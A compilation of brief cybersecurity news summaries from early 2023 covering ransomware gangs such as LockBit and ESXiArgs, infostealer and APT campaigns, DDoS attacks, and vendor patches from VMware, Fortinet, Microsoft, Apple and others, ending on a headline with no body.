    Shipping companies and medical laboratories in Asia have been the subject of a suspected espionage campaign carried out by a never-before-seen threat actor dubbed Hydrochasma. The activity, which has been ongoing since October 2022, "relies exclusively on publicly available and living-off-the-land tools," Symantec, by Broadcom Software, said in a report shared with The Hacker News. There is no evidence available as yet to determine its origin or affiliation with known threat actors, but the cybersecurity company said the group may be having an interest in industry verticals that are involved in COVID-19-related treatments or vaccines.

    VMware Patches Critical Vulnerability in Carbon Black App Control Product

    Yesterday, VMware patched a critical security vulnerability impacting its Carbon Black App Control product. Tracked as CVE-2023-20858 (CVSS score: 9.1), the flaw was discovered and disclosed to VMware by bug bounty hunter, Jari Jääskelä (@JJaaskela), and impacts App Control versions 8.7.x, 8.8.x, and 8.9.x. According to VMware, “a malicious actor with privileged access to the App Control administration console may be able to use specially crafted input allowing access to the underlying server operating system.

    Samsung Announces Message Guard Feature to Neutralize Zero-Click Attacks

    Samsung announced the implementation of a new security feature called Message Guard that aims at protecting users from malicious code that can be installed via zero-click attacks. Zero-click exploits allow attackers to compromise the target device without any user interaction, for example, a threat actor can exploit a zero-day issue by sending an image to the victims.

    Norwegian Authorities Seize $5.86 Million From Lazarus Group

    Norwegian authorities confiscated crypto assets worth nearly $5.68 million tied to the 2022 Ronin cryptocurrency bridge hack by North Korean state threat actor Lazarus Group. Norway's National Authority for Investigation and Prosecution of Economic and Environmental Crime - in Norwegian, it's known as the Økokrim - on Thursday revealed it had retrieved a part of the hacked amount from the Ronin attackers, who in March 2022 stole $620 million worth of cryptocurrency.

    HardBit Ransomware Wants Insurance Details to Set the Perfect Price

    The upgraded version of HardBit ransomware attempts to broker a ransom payment covered by its victim's insurance. Once on the victim's system, the threat group will drop a note that does not inform the entities how much the hackers want in exchange for the decryption key. Instead, victims get 48 hours to contact the attacker over an open-sourced encryption peer-to-peer messaging app. However, the ransomware gang employs complex instructions for companies that possess cyber insurance. The ransomware group explains that sneaky insurance providers advise entities to keep their premiums a secret to derail negotiations and never pay the maximum amount of ransom leaving the companies to deal with cyber criminals. Further, the note clarifies that if the victim shares their insurance information with the HardBit ransomware group, it benefits both the ransomware group and the victim. The benefit described by HardBit is that if they knew exact insurance details, they could ask the insurer for said amount, and the insurance agent would be required to cover it.

    Researchers Discover Numerous Samples of Information Stealer 'Stealc' in the Wild

    A new information stealer called Stealc that's being advertised on the dark web could emerge as a worthy competitor to other malware of its ilk. ‘The threat actor presents Stealc as a fully featured and ready-to-use stealer, whose development relied on Vidar, Raccoon, Mars, and RedLine stealers,’ SEKOIA said in a Monday report. The French cybersecurity company said it discovered more than 40 Stealc samples distributed in the wild and 35 active command-and-control (C2) servers, suggesting that the malware is already gaining traction among criminal groups.

    MyloBot Botnet Spreading Rapidly Worldwide: Infecting Over 50,000 Devices Daily

    A sophisticated botnet known as MyloBot has compromised thousands of systems, with most of them located in India, the U.S., Indonesia, and Iran. That's according to new findings from BitSight, which said it's "currently seeing more than 50,000 unique infected systems every day," down from a high of 250,000 unique hosts in 2020. Furthermore, an analysis of MyloBot's infrastructure has found connections to a residential proxy service called BHProxies, indicating that the compromised machines are being used by the latter.

    Frebniis Malware Exploits Microsoft IIS Feature

    Cybersecurity researchers have discovered a new malware that leverages a legitimate feature of Microsoft’s Internet Information Services (IIS) to install a backdoor in targeted systems. According to an advisory published last Thursday by Symantec, the malware, dubbed "Frebniis," was used by a previously unknown threat actor against targets in Taiwan.

    CISA Warns of Windows and iOS Bugs Exploited as Zero-days

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added four security vulnerabilities exploited in attacks as zero-day to its list of bugs known to be abused in the wild. Two of them impact Microsoft products and allows attackers to gain remote code execution (CVE-2023-21823) and escalate privileges (CVE-2023-23376) on unpatched Windows systems by abusing flaws in the Common Log File System Driver and graphics components. A third one (CVE-2023-21715) can be exploited to bypass Microsoft Office macro policies to deliver malicious payloads via untrusted files.

    Hackers Backdoor Microsoft IIS Servers With New Frebniis Malware

    Researchers have discovered a new malware dubbed Frebniiss on Microsoft's Internet Information Services. Symantec's Threat Hunter team observed the malware and found an unknown threat actor utilizing the malware against Taiwan-based targets. "In the attacks seen by Symantec, the hackers abuse an IIS feature called 'Failed Request Event Buffering' (FREB), responsible for collecting request metadata (IP address, HTTP headers, cookies). Its purpose is to help server admins troubleshoot unexpected HTTP status codes or request processing problems. The malware injects malicious code into a specific function of a DLL file that controls FREB ("iisfreb[.]dll") to enable the attacker to intercept and monitor all HTTP POST requests sent to the ISS server. When the malware detects specific HTTP requests the attacker sends, it parses the request to determine what commands to execute on the server.

    Atlassian Says Recent Data Leak Stems From Third-Party Vendor Hack

    A hacking group known as SiegedSec recently leaked data on Telegram, claiming to have stolen it from Atlassian, a software company based in Australia. “We are leaking thousands of employee records as well as a few building floorplans. These employee records contain email addresses, phone numbers, names, and lots more~!,” stated the hackers on Telegram. Shortly after, Atlassian stated that one of its third-party vendors, Envoy, was breached, which the company uses for in-office functions.

    Fortinet Fixes Critical RCE flaws in FortiNAC and FortiWeb

    Yesterday, Fortinet released security updates to address two critical vulnerabilities in its FortiNAC and FortiWeb products that could enable unauthenticated threat actors to perform arbitrary code or command execution. The first flaw, tracked as CVE-2022-39952 (CVSS 9.8), impacts FortiNAC, a network access control solution that organizations use to gain real-time network visibility, enforce security policies, and detect/mitigate threats.

    New Mirai Malware Variant Infects Linux Devices to Build DDos Botnet

    A new Mirai botnet variant tracked as ‘V3G4’ targets 13 vulnerabilities in Linux-based servers and IoT devices to use in DDoS (distributed denial of service) attacks. The malware spreads by brute-forcing weak or default telnet/SSH credentials and exploiting hardcoded flaws to perform remote code execution on the target devices. Once a device is breached, the malware infects it and recruits it into its botnet swarm.

    LockBit and Royal Mail Ransomware Negotiation Leaked

    The LockBit ransomware group has published a log of their negotiations with Royal Mail. Royal Mail fell victim to LockBit's attack on January 7, 2023. However, the mail delivery service refused to pay the ransom demand of 65.7 million euros. The conversations display LockBit operators attempting to persuade Royal Mail to pay the ransom by using various techniques.

    Hackers Using Google Ads to Spread FatalRAT Malware Disguised as Popular Apps

    Chinese-speaking individuals in Southeast and East Asia are the targets of a new rogue Google Ads campaign that delivers remote access trojans such as FatalRAT to compromised machines. The attacks involve purchasing ad slots to appear in Google search results that direct users searching for popular applications to rogue websites hosting trojanized installers, ESET said in a report published today. The ads have since been taken down. Some of the spoofed applications include Google Chrome, Mozilla Firefox, Telegram, WhatsApp, LINE, Signal, Skype, Electrum, Sogou Pinyin Method, Youdao, and WPS Office.

    Citrix Fixes Severe Flaws in Workspace, Virtual Apps and Desktops

    Citrix recently addressed several vulnerabilities in its Virtual Apps and Desktops, and Workspace App products. In total, patches were released for four vulnerabilities, all of which have been rated high in severity. Successful exploitation of the flaws could potentially enable threat actors with local access to the targeted system to elevate their privileges and take complete control over the system.

    Russian Hacker Convicted of $90 Million Hack-To-Trade Charges

    Russian national Vladislav Klyushin was found guilty of participating in a global scheme that involved hacking into U.S. computer networks to steal confidential earnings reports, which helped the criminals net $90,000,000 in illegal profits. Klyushin was extradited to the U.S. in December 2021 to face charges of hacking into the systems of two U.S.-based filing agents that American companies used to file earnings reports through the Securities and Exchange Commissions (SEC) system.

    Experts Warn of Surge in Multipurpose Malware

    Security researchers have warned that a growing number of versatile malware variants are capable of performing multiple malicious actions across the cyber-kill chain. Picus Security compiled its Red Report 2023 by analyzing over 500,000 malware samples last year, identifying their tactics, techniques and procedures (TTPs) and extracting over 5.3 million “actions.”

    RedEyes Hackers Use New Malware to Steal Data From Windows, Phones

    A North Korean hacking group known as APT37, Red Eyes, or StarCruft has implemented a new M2RAT malware and uses steganography for intelligence collection. Researchers at the AnhLab Security Emergency Response Center (ASEC) explained that the M2RAT uses a shared memory section for command and data exfiltration while leaving few operational traces on the compromised machine.

    New Stealthy ‘Beep’ Malware Focuses Heavily on Evading Detection

    A new stealthy malware named 'Beep' was discovered last week, featuring many features to evade analysis and detection by security software. The malware was discovered by analysts at Minerva after a flurry of samples were uploaded to VirusTotal, an online platform for file scanning and malicious content detection. Although Beep is still in development and missing several key features, it currently allows threat actors to download and execute further payloads on compromised devices remotely.

    Dozens of Vulnerabilities Patched in Intel Products

    Intel recently released patches for dozens of vulnerabilities impacting its products, including a critical flaw that was identified last year. Tracked as CVE-2021-39296, this flaw has been rated a 10 on the CVSS scale and impacts the Integrated Baseboard Management Controller (BMC) and OpenBMC firmware of several Intel platforms. In particular CVE-2021-39296 affects the netipmid (IPMI Ian+) interface and could enable a threat actor to obtain root access to the BMC by bypassing authentication via specially crafted IPMI messages. Also addressed in BMC and OpenBMC firmware are four other vulnerabilities including a high-severity out-of-bounds read issue that could cause denial of service on the impacted device. Intel says it has fixed these issues in the latest releases of Integrated BMC firmware versions 2.86, 2.09 and 2.78, and OpenBMC firmware versions 0.72, wht-1.01-61, and egs-0.91-179.

    Microsoft February 2023 Patch Tuesday Fixes 3 Exploited Zero-Days, 77 Flaws

    Yesterday was Microsoft's February 2023 Patch Tuesday; security updates corrected three actively exploited zero-day vulnerabilities and a total of 77 flaws. Nine vulnerabilities were classified as 'Critical' as they could result in remote code execution if leveraged by an attacker. Although some of the vulnerabilities were classified as more severe than others, successful exploitation of those listed could have a diverse range of effects. As reported by the tech giant, the vulnerabilities, if utilized, could have an impact equivalent to Denial of Service, Remote Code Execution, Privilege Escalation, or a combination of all three.

    SideWinder APT Attacks Regional Targets in New Campaign

    Security researchers have discovered dozens of new regional targets and new cyber-attack tools linked to Indian APT group SideWinder. The suspected state-sponsored group – also known as Rattlesnake, Hardcore Nationalist (HN2) and T-APT4 – comes under the spotlight in a new report from Group-IB, Old snake, new skin: Analysis of SideWinder APT activity between June and November 2021

    New ‘MortalKombat’ Ransomware Targets Systems in the U.S.

    Hackers conducting a new financially motivated campaign are using a variant of the Xortist commodity ransomware named 'MortalKombat,' together with the Laplas clipper in cyberattacks. Both malware infections are used to conduct financial fraud, with the ransomware used to extort victims to receive a decryptor and Laplas to steal cryptocurrency by hijacking crypto transactions. Laplas is a cryptocurrency hijacker released last year that monitors the Windows clipboard for crypto addresses and, when found, substitutes them for addresses under the attacker's control. As for MortalKombat, Cisco Talos says the new ransomware is based on the Xorist commodity ransomware family, which utilizes a builder that lets threat actors customize the malware. Xorist has been decryptable for free since 2016

    Apple Fixes New WebKit Zero-Day Exploited to Hack iPhones, Macs

    Yesterday, Apple released fixes to address a new actively exploited zero-day flaw being used to target impacted iPhones, iPads, and Macs. Tracked as CVE-2023-23529, the vulnerability is related to a WebKit confusion issue that can allow a threat actor to trigger OS crashes and obtain code execution on compromised devices.

    Cloudflare Blocks Record-Breaking 71 Million RPS DDoS Attack

    This weekend, Cloudflare blocked what it describes as the largest volumetric distributed denial-of-service (DDoS) attack to date. The company said it detected and mitigated not just one but a wave of dozens of hyper-volumetric DDoS attacks targeting its customers over the weekend, The majority of attacks peaked in the ballpark of 50-70 million requests per second (rps) with the largest exceeding 71 million rps. This is the largest reported HTTP DDoS attack on record, more than 35% higher than the previous reported record of 46M rps in June 2022. The attacks were launched using over 30,000 IP addresses from multiple cloud providers against various targets, including gaming providers, cloud computing platforms, cryptocurrency firms, and hosting providers.

    Lazarus Hackers Use New Mixer to Hide $100 Million in Stolen Crypto

    The Lazarus Group is responsible for $100 million in stolen Bitcoin through the implementation of; a crypto-mixing service dubbed Sinbad. Sinbad is a custodial mixer meaning "that all cryptocurrency that goes into the service is under the control of the operator; so owners have sufficient confidence to give up command of their funds.

    FTC: $1.3 Billion Lost by 70,000 Americans to Romance Scams Last Year

    The U.S. Federal Trade Commission (FTC) says Americans once again reported record losses of $1.3 billion to romance scams in 2022, with median losses of $4,400. According to previous FTC's Consumer Sentinel Network (Sentinel) sources, Americans have also reported losing $493 million in 2019, $730 million in 2020, and $1.3 billion throughout 2021

    City of Oakland Systems Offline After Ransomware Attack

    The City of Oakland; was hit by a ransomware attack on Wednesday night. The ransomware group responsible for the attack is currently unknown. However, as a consequence of the incident, the City of Oakland was forced to shut down its systems. The attack has not influenced the city's core services. Additionally, all emergency services are working as expected. The City's Information Technology Department is collaborating with law enforcement to investigate the attack and reinstate services affected by the assault. The city stated that they are organizing a response plan to address the issue, and the public should expect delays from the City of Oakland; in the meantime.

    NameCheap's Email Hacked to Send Metamask, DHL Phishing Emails

    Domain registrar Namecheap had their email account breached Sunday night, causing a flood of MetaMask and DHL phishing emails that attempted to steal recipients' personal information and cryptocurrency wallets. The phishing campaigns started around 4:30 PM ET and originated from SendGrid, an email platform used historically by Namecheap to send renewal notices and marketing emails. After recipients began complaining on Twitter, Namecheap CEO Richard Kirkendall confirmed that the account was compromised and that they disabled email through SendGrid while they investigated the issue. Kirkendall also said that they believe the breach may be related to a December CloudSek report on the API keys of Mailgun, MailChimp, and SendGrid being exposed in mobile apps.

    Chinese Tonto Team Hackers' Second Attempt to Target Cybersecurity Firm Group-IB Fails

    According to a new blog post published by Group-IB, the cybersecurity firm has been the target of several attacks carried out by the Tonto team, an advanced persistent threat group suspected to be of Chinese origin. Tonto Team, also known as Bronze Huntley, Cactus Pete, Earth Akhlut, Karma Panda, and UAC-0018, has been around since 2009. The group is known for targeting military, diplomatic, and infrastructure entities in Asia and Eastern Europe.

    Devs targeted by W4SP Stealer malware in malicious PyPi packages

    Five malicious packages were found on the Python Package Index (PyPI), stealing passwords, Discord authentication cookies, and cryptocurrency wallets from unsuspecting developers. PyPI is a software repository for packages created in the Python programming language. As the index hosts 200,000 packages, it allows developers to find existing packages that satisfy various project requirements, saving time and effort. Between January 27 and January 29, 2023, a threat actor uploaded five malicious packages containing the 'W4SP Stealer' information-stealing malware to PyPi. While the packages have since been removed, they have already been downloaded by hundreds of software developers.

    Pro-Russia Hacker Group Killnet Targets NATO Websites with DDoS Attacks

    Pro-Russia hacker group Killnet launched a Distributed Denial of Service (DDoS) attack on NATO sites, including the NATO Special Operations Headquarters (NSHQ) website. The attack was confirmed by NATO, while the hacker group announced the attack on its Telegram. NATO said in a statement, “NATO cyber experts are actively addressing an incident affecting some NATO websites. NATO deals with cyber incidents on a regular basis, and takes cyber security very seriously.

    Hacker Develops New ‘Screenshotter’ Malware to Find High-Value Targets

    A new threat actor is targeting the United States and Germany with new malware that encases the capability to perform surveillance and data theft on compromised systems. The cybercriminal; is recognized as TA866. Researchers at Proofpoint observed activity by TA866 in October 2022. However, TA866 is still active in 2023. The cybercriminal lures victims using phishing emails. The emails "include Microsoft Publisher (.pub) attachments with malicious macros, URLs linking to .pub files with macros, or PDFs containing URLs that download dangerous JavaScript files.

    North Korean Hackers Targeting Healthcare with Ransomware to Fund its Operations

    According to a joint advisory released yesterday by US and South Korean cybersecurity and intelligence agencies, North Korean state-backed actors are conducting ransomware attacks against healthcare and critical infrastructure facilities to fund their illicit activities. The actors are demanding cryptocurrency demands in exchange for recovering access to encrypted files. The funds received from victims in turn are being used to support North Korea’s national-level priorities and objectives, including targeting the United States and South Korean governments such as the Department of Defense Information Networks and Defense Industrial Base member networks. To bring awareness and help organizations defend against similar ransomware attacks, the joint advisory includes common TTPs used by the Democratic People’s Republic of Korea (DPRK) state-sponsored actors as well as relevant Indicators of compromise.

    Hackers Breach Reddit to Steal Source Code and Internal Data

    Reddit suffered a cyberattack Sunday evening, allowing hackers to access internal business systems and steal internal documents and source code. According to an alert by the company, threat actors used a phishing lure targeting Reddit employees with a landing page impersonating its intranet website. The site was then used to steal employee’s credentials and two-factor authentication tokens.

    Ciena Blue Planet SAML Vulnerabilities

    A privilege escalation vulnerability has been identified with the SAML implementation in Blue Planet products. If you do not use SAML to access Blue Planet applications, you are not exposed to this vulnerability. This vulnerability is only applicable if you have enabled SAML access on your Blue Planet application. If you are using SAML for authentication, there is a vulnerability, which could be exploited only with access to the Blue Planet application.

    Hackers Use Fake Crypto Job Offers to Push Info-Stealing Malware

    A campaign operated by Russian threat actors uses fake job offers to target Eastern Europeans working in the cryptocurrency industry, aiming to infect them with a modified version of the Stealerium malware named 'Enigma.' According to Trend Micro, which has been tracking the malicious activity, the threat actors use a set of heavily obfuscated loaders that exploits an old Intel driver flaw to reduce the token integrity of Microsoft Defender and bypass protections. The attacks start with an email pretending to be a job offer with fake cryptocurrency interviews to lure their targets. The emails have a RAR archive attachment which contains a TXT ("interview questions.txt") and an executable ("interview conditions.word.exe").

    Tor and I2P Networks Hit by Wave of Ongoing DDoS Attacks

    A wave of denial-of-service attacks has targeted the Tor Network since July 2022. Since then, users have been experiencing connectivity and performance issues. Some users report being unable to load pages or access onion services. The Tor Network team is adjusting network defenses to address the ongoing matter. The Tor Network is adding two new members to focus on .onion services. Furthermore, Tor Project's executive director Isabela Dias Fernandez has stated that the Network's team is choosing to limit public information on the nature of the attacks for now and clarified that their services have not been down, just slow; and that user experiences vary from person to person.

    VMware Finds No Evidence of 0-Day in Ongoing ESXiArgs Ransomware Spree

    VMware on Monday said it found no evidence that threat actors are leveraging an unknown security flaw, i.e., a zero-day, in its software as part of an ongoing ransomware attack spree worldwide. ‘Most reports state that End of General Support (EoGS) and/or significantly out-of-date products are being targeted with known vulnerabilities which were previously addressed and disclosed in VMware Security Advisories (VMSAs),’ the virtualization services provider said. The company is further recommending users to upgrade to the latest available supported releases of vSphere components to mitigate known issues and disable the OpenSLP service in ESXi.

    Clop Ransomware Flaw Allowed Linux Victims to Recover Files for Months

    Clop ransomware has come out with a new variant specially designed to target Linux Servers. The new variant was spotted in the wild in December 2022 by security researcher Antonis Terefos at SentinelLabs after it was used to target a university in Colombia. Although the new strain is very similar to its Windows counterpart (e.g. same encryption method and almost identical process logic), the Linux variant seems to be in the early stages of development and lacks features, including proper obfuscation and evasiveness mechanisms, making it possible for victims to retrieve their files without paying any ransom demands.

    OpenSSL Fixes Multiple New Security Flaws with Latest Update

    OpenSSL recently fixed several security flaws in its open-source cryptographic library, including 1 type confusion bug rated high in severity vulnerability as well as 7 other vulnerabilities that have been rated medium in severity. The type confusion bug is being tracked as CVE-2023-0236 and can allow attackers to read memory contents or enact a denial of service. “The vulnerability is rooted in the way the popular cryptographic library handles X.509 certificates, and is likely to impact only those applications that have a custom implementation for retrieving a certificate revocation list (CRL) over a network.

    U.S. and U.K. Sanction TrickBot and Conti Ransomware Operation Members

    The United States and the United Kingdom have sanctioned seven Russian individuals for their involvement in the TrickBot cybercrime group, whose malware was used to support attacks by the Conti and Ryuk ransomware operation. The sanctions come after a massive trove of internal conversations, and personal information was leaked from Conti and TrickBot members in what was called the ContiLeaks and TrickLeaks. While the ContiLeaks focused more on leaking internal conversations and source code, the TrickLeaks went one step further, with the identities, online accounts, and personal information of TrickBot members publicly leaked on Twitter. These data breaches ultimately led to the Conti gang shutting down their operation and their members starting new ransomware operations or joining existing ones.

    US NIST Unveils Winning Encryption Algorithm for IoT Data Protection

    The National Institute of Standards and Technology (NIST) announced that ASCON is the winning bid for the "lightweight cryptography" program to find the best algorithm to protect small IoT (Internet of Things) devices with limited hardware resources. Small IoT devices are those often found in wearable technologies, smart home applications, and more. Due to their size, they have limited hardware resources to handle robust encryption standards. While the devices, may lack hardware, they are often used to store and handle sensitive personal information such as health and financial details. NIST was looking to implement a standard for encrypting data on these devices, which have very little computational power.

    New ESXiargs Ransomware Version Prevents VMware ESXi Recovery

    Unfortunately, a second ESXiArgs ransomware wave started today and includes a modified encryption routine that encrypts far more data in large files. BleepingComputer first learned of the second wave after an admin posted in the ESXiArgs support topic stating that their server was encrypted and could not be recovered using the methods that had worked previously. Preliminary reports indicated that the devices were breached using old VMware SLP vulnerabilities. However, some victims have stated that SLP was disabled on their devices and were still breached and encrypted.

    New QakNote Attacks Push QBot Malware via Microsoft OneNote Files

    A new Qbot malware campaign has emerged. "Qbot (aka QakBot) is a former banking trojan that evolved into malware that specializes in gaining initial access to devices, enabling threat actors to load additional malware on the compromised machines and perform data-stealing, ransomware, or other activities across an entire network.

    Chrome 110 Patches 15 Vulnerabilities

    On February 7, Google announced the promotion of Chrome 110 to the stable channel for Windows, Mac, and Linux, addressing a total of 15 security flaws, 10 of which were uncovered and brought to attention by external researchers. Three of the vulnerabilities have been rated high in severity and relate to a type confusion flaw in the V8 engine (CVE-2023-0696), an inappropriate implementation issue in full screen mode (CVE-2023-0697), and an out-of-bounds read vulnerability in WebRTC (CVE-2023-0698). CVE-2023-0696 can allow a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE-2023-0697 could enable a remote attacker to use a crafted HTML page to spoof the contents of the security UI while the third vulnerability (CVE-2023-0698) can be exploited to perform an out of bounds memory read.

    Russian Hackers Using New Graphiron Information Stealer in Ukraine

    The Russian hacking group known as 'Nodaria' (UAC-0056) is using a new information-stealing malware called 'Graphiron' to steal data from Ukrainian organizations. The Go-based malware can harvest a wide range of information, including account credentials, system, and app data. The malware will also capture screenshots and exfiltrate files from compromised machines. Symantec's threat research team discovered that Nodaria has been using Graphiron in attacks since at least October 2022 through mid-January 2023.

    CISA Releases Recovery Script for ESXiargs Ransomware Victims

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a script to recover VMware ESXi servers encrypted by the recent widespread ESXiArgs ransomware attacks. Starting last Friday, exposed VMware ESXi servers were targeted in a widespread ESXiArgs ransomware attack. Since then, the attacks encrypted 2,800 servers according to a list of bitcoin addresses collected by CISA technical advisor Jack Cable. While many devices were encrypted, the campaign was largely unsuccessful as the threat actors failed to encrypt flat files, where the data for virtual disks are stored.

    BEC Attacks Surge 81% in 2022

    Recorded business email compromise (BEC) attacks increased by more than 81% during 2022 and by 175% over the past two years, with open rates on malicious emails also surging, according to Abnormal Security. The security vendor analyzed data from its customers to help compile its H1 2023 threat report, Read Alert.

    Anonymous Leaked 128GB of Data Stolen From Russian ISP Convex Revealing FSB’s Warrantless Surveillan

    The massive trove of data was leaked by an affiliate of the Anonymous group called Caxxii. The stolen documents contain evidence of a dragnet surveillance activity conducted by the Federal Security Service (FSB), headquartered in Moscow. The Russian government is said to monitor its citizens and private organizations across the country illegally. A Russian-based organization known as ‘Convex’ launched a project code-named ‘Green Atom’ whose overall goal was to spy on Russian citizens through unauthorized wiretapping, espionage, and warrantless surveillance of citizens.

    LockBit Ransomware Gang Claims Royal Mail Cyberattack

    The notorious ransomware gang LockBit has claimed another victim. On February 6, 2022, the threat actors published Royal Mail to their data leak site. The attack has led the UK-based mail delivery service to halt international shipping services due to a severe service disruption. "This comes after LockBitSupport, the ransomware gang public-facing representative, previously told BleepingComputer that the LockBit cybercrime group did not attack Royal Mail. Instead, they blamed the attack on other threat actors using the LockBit 3.0 ransomware builder that was leaked on Twitter in September 2022.

    Hackers Backdoor Windows Devices in Sliver and BYOVD Attacks

    A new hacking campaign exploits Sunlogin flaws to deploy the Sliver post-exploitation toolkit and launch Windows Bring Your Own Vulnerable Driver (BYOVD) attacks to disable security software. Sliver is a post-exploitation toolkit created by Bishop Fox that threat actors began using as a Cobalt Strike alternative last summer, employing it for network surveillance, command execution, reflective DLL loading, session spawning, process manipulation, and more.

    Attorney General Forces Spyware Vendor to Alert Victims

    The New York attorney general's office has announced a $410,000 fine for a stalker developer who used 16 companies to promote surveillance tools illegally. Patrick Hinchy, the spyware vendor, also agreed to alert his customers' victims that their phones are being secretly monitored using one of his multiple apps, including Auto Forward, Easy Spy, DDI Utilities, Highster Mobile, PhoneSpector, Surepoint, or TurboSpy.

    New Credential-Stealing Campaign By APT34 Targets Middle East Firms

    A malicious campaign targeting organizations in the Middle East with a new backdoor malware has been spotted by security researchers. Describing the activity in a Thursday advisory, Trend Micro researchers Mohamed Fahmy, Sherif Magdy and Mahmoud Zohdy have attributed it to the advanced persistent threat (APT) group the company refers to as APT34.

    Linux version of Royal Ransomware targets VMware ESXi servers

    Royal Ransomware group has come out with a new variant designed to encrypt Linux devices, specifically targeting VMware ESXI virtual machines. According to security researcher, Will Thomas, who uncovered the new strain, Royal’s encryptor now supports multiple flags giving operators control over the encryption process: stopvm > stops all running VMs so they can be encrypted vmonly - Only encrypt virtual machines fork - unknown logs - unknown id: id must be 32 characters VM files encrypted with the new variant are appended with the “.royal_u extension. As of writing, less than 50% of malware scanning engines on VirusTotal are capable of detecting the strain.

    New Russian ‘Passion’ DDoS-As-A-Service Platform Used in Recent Attacks

    A new DDoS-as-a-Service (DDoSaaS) platform named 'Passion' was seen used in recent attacks by pro-Russian hacktivists against medical institutions in the United States and Europe. DDoSaaS platforms rent their available firepower to those looking to launch disruptive attacks on their targets, absolving them from the need to build their own large botnets or coordinate volunteer action. Typically, these botnets are built by compromising vulnerable IoT devices such as routers and IP cameras, uniting them under a large swarm that generates malicious requests toward a particular target. Radware discovered the Passion platform, and although its origins are unknown, the operation has distinctive ties with Russian hacking groups, such as Killnet, MIRAI, Venom, and Anonymous Russia. "The Passion Botnet was leveraged during the attacks on January 27th, targeting medical institutions in the USA, Portugal, Spain, Germany, Poland, Finland, Norway, Netherlands, and the United Kingdom as retaliation for sending tanks in support of Ukraine," said Radware researchers.

    New Nevada Ransomware Targets Windows and VMware ESXi Systems

    A new ransomware operation; was discovered. The ransomware is known as Nevada. Researchers have observed the variants evolving capabilities, such as targeting Windows and VMware ESXi systems. Nevada ransomware started to be promoted on the RAMP darknet forums on December 10, 2022, inviting Russian and Chinese-speaking cybercriminals to join it for an 85% cut from paid ransoms. For those affiliates who bring in a lot of victims, Nevada says they will increase their revenue share to 90%. RAMP has been previously reported as a space where Russian and Chinese hackers promote their cybercrime operations or communicate with peers.

    LockBit ransomware goes 'Green,' uses new Conti-based encryptor

    The LockBit ransomware gang has again started using encryptors based on other operations, this time switching to one based on the leaked source code for the Conti ransomware. Since its launch, the LockBit operation has gone through numerous iterations of its encryptor, starting with a custom one and moving to LockBit 3.0 (aka LockBit Black), which is derived from the BlackMatter gang's source code. This week, cybersecurity collective VX-Underground first reported that the ransomware gang is now using a new encryptor named 'LockBit Green,' based on the leaked source code of the now-disbanded Conti gang.

    Experts Warn of 'Ice Breaker' Cyberattacks Targeting Gaming and Gambling Industry

    A new attack campaign has been targeting the gaming and gambling sectors since at least September 2022, just as the ICE London 2023 gaming industry trade fair event is scheduled to kick off next week. Israeli cybersecurity company Security Joes is tracking the activity cluster under the name Ice Breaker, stating the intrusions employ clever social engineering tactics to deploy a JavaScript backdoor. The attack sequence proceeds as follows: The threat actor poses as a customer while initiating a conversation with a support agent of a gaming company under the pretext of having account registration issues. The adversary then urges the individual on the other end to open a screenshot image hosted on Dropbox.

    No Pineapple Hacking Campaign Reveals North Korean Toolkit

    Cybersecurity firm WithSecure says it detected a campaign targeting the medical research and energy sectors that came to its attention after endpoint detection scans showed a Cobalt Strike beacon on a customer's servers connecting to known threat actor IP addresses. Researchers from the Finnish company dub the campaign "No Pineapple," taking the lead of a fruit-loving software developer of a remote access Trojan called acres.exe deployed by the hackers. The tool truncates data exfiltration messages greater than 1,024 bytes with the message "No Pineapple!

    Ransomware Attack on ION Group Impacts Derivatives Trading Market

    The LockBit ransomware gang has claimed responsibility for the cyberattack on ION Group, a UK-based software company whose products are used by financial institutions, banks, and corporations for trading, investment management, and market analytics. Back on January 31, 2023, the firm released a statement saying a cyber incident had impacted ION Cleared Derivatives, a division of ION Markets. “The incident is contained to a specific environment, all the affected servers are disconnected, and remediation of services is ongoing. Further updates will be posted when available” - ION Group.

    New Report Reveals NikoWiper Malware That Targeted Ukraine Energy Sector

    ESET uncovered yet another wiper malware strain , dubbed NikoWiper, used by Russia affiliated Sandworm to attack a energy sector company in Ukraine, on October 2022. Not much is known about NikoWiper besides the fact that it is based on SDelete, a command line utility from Microsoft that is used for securely deleting files. According to researchers, the attack on the company took place around the same time as when Russian armed forces targeted Ukrainian energy infrastructure with missile strikes.

    New Sh1mmer Chromebook Exploit Unenrolls Managed Devices

    Researchers have discovered a new exploit dubbed Sh1mmer. The exploit allows users to install and bypass device restrictions by unenrolling in an enterprise-managed Chromebook. "The exploit requires a publicly leaked RMA shim that the Sh1mmer exploit will modify to allow users to manage the device's enrollment. The researchers say that the following Chromebook boards are known to have publicly released RMA shims brask, brya, clapper, coral, dedede, enguarde, glimmer, grunt, hana, hatch, jacuzzi, kukui, nami, octopus, orco, pyro, reks, sentry, stout, strongbad, tidus, ultima, volteer, zork. For those unfamiliar with RMA shims, they are disk images stored on USB devices that contain a combination of the ChromOS factory bundle components used to reinstall the operating system and manufacturer tools used to perform repair and diagnostics."

    Microsoft Stops Selling Windows 10 Licenses a Day Early

    Marking an end to an era, Microsoft is no longer directly selling Windows 10 product keys on their website, instead redirecting users to Windows 11 product pages. This month, Microsoft began displaying an alert on their Windows 10 Home and Pro product pages, warning customers that January 31st would be the last day to purchase a license.

    Microsoft: Over 100 Threat Actors Deploy Ransomware in Attacks

    Microsoft revealed today that its security teams are tracking over 100 threat actors deploying ransomware during attacks. In all, the company says it monitors over 50 unique ransomware families that were actively used until the end of last year. "Some of the most prominent ransomware payloads in recent campaigns include Lockbit Black, BlackCat (aka ALPHV), Play, Vice Society, Black Basta, & Royal," Microsoft said.

    QNAP Fixes Critical Bug Letting Hackers Inject Malicious Code

    QNAP recently released firmware updates to address a critical security vulnerability that could enable remote attackers to inject malicious code on QNAP NAS devices. Tracked as CVE-2022-27596, the flaw impacts QTS 5.0.1 and QuTS hero h5.0.1 versions of the operating system. According to the networking hardware company, the bug is related to a SQL injection flaw that could be exploited by threat actors to send specially crafted requests on vulnerable devices and modify legitimate SQL queries. QNAP says this flaw can be exploited in low-complexity attacks and does not require user interaction or privileges on the targeted devices.

    Porsche Halts NFT Launch, Phishing Sites Fill the Void

    Porsche, the German automobile manufacturer specializing in high-performance vehicles, halted their anticipated NFT launch. The vehicle manufacturer produced its first NFT mint on January 23, 2023. A digital replica of one of their renowned 911 car, the ETH value on the NFT was around $1,500. Additionally, Porsche promised their NFT community 7,500 NFTs in their new collection.

    Exploit Released for Critical VMware VRealize RCE Vulnerability

